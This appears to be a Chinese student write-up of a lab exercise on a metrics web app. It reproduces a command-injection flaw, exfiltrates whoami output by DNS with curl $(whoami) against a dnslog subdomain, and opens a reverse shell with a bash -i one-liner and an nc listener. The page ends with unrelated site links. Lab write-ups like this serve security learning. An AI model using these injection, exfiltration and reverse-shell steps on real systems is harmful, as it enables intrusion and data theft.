当前位置: 首页 > news >正文

手机网站模板国外h5网站模板

手机网站模板,国外h5网站模板,wordpress页面如何调用文章分类,免费建站网站排名任务一: 复现环境中的命令注入漏洞。 任务二: 利用命令注入执行whoami,使用DNS外带技术获取结果 任务三:使用反弹shell,将漏洞环境中的shell反弹到宿主机或者vps服务器。 任务一: 1.搭建好环境 2.先去了…

任务一:
复现环境中的命令注入漏洞。
任务二:
利用命令注入执行whoami,使用DNS外带技术获取结果
任务三:使用反弹shell,将漏洞环境中的shell反弹到宿主机或者vps服务器。

任务一:
1.搭建好环境
在这里插入图片描述
在这里插入图片描述
2.先去了解一下这个网站的功能
在这里插入图片描述
在这里插入图片描述
3.首先查看存在的metric,发现在这里是0
在这里插入图片描述
4.我们写入一个metric,首先利用burpsuite进行抓包然后用post请求添加请求体加入metric,然后我们再次查看metrics发现我们已经成功写入一个metric。
在这里插入图片描述
在这里插入图片描述
5.然后进行代码执行漏洞,在tmp下创建一个success文件,得到回显

在这里插入图片描述

在这里插入图片描述
6.然后进入容器中查看(一定要查看创建的文件路径,其他的包含任何的都不是,因为这个找了好久好久,其实很早就做出来了,还以为做错了,无语死了)。

在这里插入图片描述
任务二:
1.直接把输出的whoami重定向到1.txt文件里面(中间要用%20作为空格,不然会失败,因为这个卡了好久,看到burpsuite的颜色那里不对了)

在这里插入图片描述
2.查看1.txt文件,发现我是root。
在这里插入图片描述

3.如果是利用DNS外带技术获得结果的话
首先登入dnslog.cn,然后点击get subdomain获得专属的子域名。
在这里插入图片描述
4.然后使用curl $(whoami).子域名,然后上面回显的时候出现了(root.子域名),得到(这里有一个问题,最开始用的ping,一直没ping通,不知道为啥)
在这里插入图片描述
任务三:
1.用(bash -c “bash -i ·········“)
在这里插入图片描述
2.这里试了很久自己的反弹shell都不成功,然后试了很多次,先是把端口打开了,用ufw添加端口 ufw allow +端口,然后把自己的nc变成了 nc -lvp +端口,然后再sec一次,反弹成功了。
在这里插入图片描述

在这里插入图片描述

http://www.yayakq.cn/news/875806/

相关文章:

  • 手把手教你实现电商网站开发seo工作职位
  • 网站开发 html长春建站程序
  • 做网站项目所需资源重庆网站建设重庆
  • 廊坊网站关键词推广小型企业网络设计方案报告
  • 装修网站建设网seo关键字优化教程
  • 服装服饰设计网站网站维护年费
  • 贵阳有哪些做网站的公司昆明网站空间
  • 怎么自己做企业网站wordpress企业免费模板
  • 做违规网站深圳专门做兼职的网站
  • 官网查询网站用dw做网站怎么添加背景图片
  • 女同性做的视频网站中国互联网协会理事长
  • 南昌市建设网站淘宝天猫网上购物商城
  • 邯郸住房和城乡建设部网站厦门建设厅网站
  • wdcp 网站打不开苏州工业园区网站
  • 网站站点地图设计烟台响应式网站建设
  • 代理游戏网站山东交通学院精品课程建设网站
  • 全返网站建设深圳网站建设公司联系方式
  • 做英文网站要会什么中国最好的建筑设计公司
  • 新华社两学一做网站兰州 网站建设公司
  • 净水 技术支持 东莞网站建设域名连接到网站
  • 福田网站建设设计公司搜索引擎 网站推广 举例
  • 建设商业门户网站的重要网站建设在电子商务中的作用
  • 建一个网站素材哪里来广州网站建设网络推广
  • 用dw做网站的过程金坛建设网站
  • 公司网站如何做二维码茅台镇哪一家网站做的好
  • 网站建设课程的感受wordpress炫酷博客
  • 晟阳建设官方网站做彩票网站制作
  • 义乌做网站的电话谷歌外链工具
  • 建设部监理协会网站昆明百度推广优化
  • 代做网站作业上海网站制作开发